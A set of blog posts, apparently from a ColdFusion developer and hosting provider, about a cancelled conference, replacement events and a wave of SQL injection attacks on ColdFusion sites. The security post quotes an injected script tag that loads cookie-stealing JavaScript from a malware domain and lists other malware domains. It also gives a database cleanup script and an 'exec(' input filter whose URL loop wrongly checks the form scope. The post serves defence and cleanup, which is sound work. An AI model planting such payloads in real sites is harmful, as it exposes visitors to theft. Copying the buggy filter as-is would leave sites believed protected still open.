As you have probably noticed by now, CFDevCon unfortunately got cancelled. This was mainly due to lack of sponsorship which meant we could not afford to run the event, and there were really no cutbacks we could make to get around this as the main cost was the venue.

As one door closes, another opens, with AWeeDram conveniently popping up and advertising itself as a "replacement for CFDevCon" and costing only £10 entry, so there is no excuse not to come.

In the style of the original CFDevCon, they just have a single track with a great lineup of 7 terrific speakers, presenting on topics that many want to know or know more about: ColdSpring, OO, clustering, Subversion, dev practices, and Railo. And the topics are bring presented consecutively so you won't need to worry about missing a single one. That also makes for an easy read of the web site: it's just a single page, with popups for each talk. Take just a minute to check it out.

Put on by the same folks who run Scotch on the Rocks, I'm sure A Wee Dram will be as fun (and relaxed) as it will be informative. 

While I am always happy to see another CF related event, I wasn't really too happy at the way they went about organising it and announcing it as a replacement for CFDevCon without even telling us. Had they taken a few moments to communicate their plans to me, I would have been more than happy to support it and put a notice on the CFDevCon site officially endorsing AWeeDram as a replacement for CFDevCon. 

This week there has been an increase in SQL Injection attacks, specifically against ColdFusion sites since the hackers have discovered they are also vulnerable, primarily due to most developers not using <cfqueryparam>. You should also be aware that prior to the actual attacks, bots are first running vulnerability tests against sites to find out which language and which database they are using to determine which vulberability they may be vulberable to.

Use of cfqueryparam is pretty much a must have requirement for your queries these days and is generally secure because it results in a prepared statement, which is always binded as a string, which is not vulnerable to sql injection. But, many ColdFusion developers do not seem to use cfqueryparam probably due to not knowing it exists. In fact CFQueryParam has existed since CF4.5, andI have to admit even I didn't know that, it has only really been promoted as a best practice and way to avoid SQL injection since CF6.

In mid-July, the hacker webzine 0x000000.com discussed potential pitfalls, particularly within older versions of ColdFusion, which could lend themselves to potential compromise:

~ Easily discoverable passwords
~ Lack of parameterized query handling
~ Failure to properly escape single quotes
~ Returning error messages that are too verbose

Like standard SQL injection, ColdFusion attacks have been around for years. What appears to have happened now appears to be the same thing that led to the millions of compromises in the ASP/SQL Server attacks - the use of automated tools.

Following are some of the malware domains involved in the recent ColdFusion attacks:

• mh.976801.cn
• 1.verynx.cn
• mm.ll80.com

Over at CFMX Hosting we have had quite a lot of customers hit by the verynx.cn attack, which inserts the following into your database tables.

</title><script src="http://1.verynx.cn/w.js"></script>

The resulting javascript which gets loaded into your pages is used to "phish" your visitors details by copying their cookies and other personal details from form fields. There are various incarnations of this attack now, resulting in different scripts being inserted into your database. If restoring a database backup is not an option for you, then the following little script may help you out.

DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN exec('update ['+@T+'] set ['+@C+']=replace(['+@C+'],''"></title><script src="http://1.verynx.cn/w.js"></script><!--'','''')')
FETCH NEXT FROM Table_Cursor INTO @T,@C END
CLOSE Table_Cursor DEALLOCATE Table_Cursor


This script will UNDO the changes made by the attack by searching for the afore mentioned string in all columns in all table in your database and removing it. All you need to do is modify the string to match the changes that were made to your database. If your site was attacked multiple times then the string may appear more than one, so you may have to run this script more than once.

Protecting Yourself 

All of the attacks we have seen so far seem to be implemented by using the "Exec()" command, so are only affecting Microsoft SQL Server databases. So a quick and easy way to stop this is to add a URL and FORM scope validation script to your application.cfm or application.cfc to make sure none of these variables contain the Exec() command.

E.G.

<cfloop collection="#form#" item="item">
 <cfif form[item] contains "exec(">
    .. your decision code here ...
 </cfif>
</cfloop>
<cfloop collection="#URL#" item="item">
 <cfif form[item] contains "exec(">
     .. your decision code here ...
 </cfif>
</cfloop>

You could of course expand this further to check for any kind of SQL statement in the FORM or URL scope, as really there never should be any SQL in these scopes if your code is well written. Your decision code will determine what happens if a match is found. As it is obviously an attack there is no point in continuing to process the request and strip out the unwanted strings, so you may as well just abort it or generate an error page.

You should of course also be adding cfqueryparam tags to all your queries too, or if you are still running older version of CF then you should be validating the data types in another way, using <cfapram> or val() for example.

The best approach you can take is to lock down your database users with specific permissions so that your web site can only SELECT from the database and cannot update, delete, execute. You should ideally only allow these permissions from your backend admin system. If there are parts of your site that need to update the database, restrict the dbuser or DSN to only be able to update the specific tables/columns they need to.

If you need to find out which pages in your site have been attacked, then you should check your web logs, and search for things like "exec" or "declare" or other sql statements.

I know many of you have been eagerly awaiting the next CFDevCon ColdFusion conference, well you will be happy to hear the new 2008 web site is now live as of yesterday and registrations are now open.

The survey results in 2006 were quite clear, most delegates wanted a better venue, a better conference hotel, better food, more tracks, more days and more bells and whistles and were happy to pay more for the tickets, so as this is a community driven event by developers for developers, that is what we have done, and we think we have still managed to keep the price quite reasonable too.

This year is a 2 day event with multiple tracks and an array of well known speakers presenting on popular topics. We have also opted for the seaside town of Brighton as the location this year, which is only 45 minutes direct from London Victoria on the train, so not only do you get to attend a great conference, but you can also then have a nice weekend break by the sea if you so wish. Much better than being stuck in rip-off London we think, with its outlandish prices, crowded/smelly streets and tube stations, unreliable public transport, and having to rush to catch the last tube back to your hotel every night.

So what are you waiting for, mosey on over to www.cfdevcon.com and register already.

2008 WebManiacs Conference

Hurry, seats are filling up fast!

Conference Highlights:

 

• Four concurrent HANDS-ON sessions where you will practice implementing best-practices techniques with your Adobe certified instructor in one of our recently remodeled computer labs!

   

• Four concurrent lecture-discussion sessions from industry veterans

   

• Sessions targeted specifically for Government IT, non-profits, and commercial sectors

   

• Sessions for beginning, intermediate, and advanced developers

   

• Over fifty (50) speakers!

   

• TWO HUNDRED sessions in total covering nearly 140 separate and distinct topics!

Since well before coining the term Rich Internet Application (RIA) in 2002, Adobe has been deeply focused on improving the web experience and delivering the underlying technologies to produce more interactive and expressive web applications.

Join Adobe and Carahsoft for a webcast showcasing how ColdFusion 8's built-in integration enables the development of Flex and AIR applications to meet users' demanding requirements more efficiently.

RIAs offer organizations a proven, cost-effective way to deliver modern applications with real business benefits, which include:

• A richer, more engaging experience for users
• Keeping pace with users' rising expectations
• An increase in customer loyalty and higher profit generation
• The ability to reach 98% of Internet-enabled desktops
• Leverage of existing personnel, processes, and infrastructure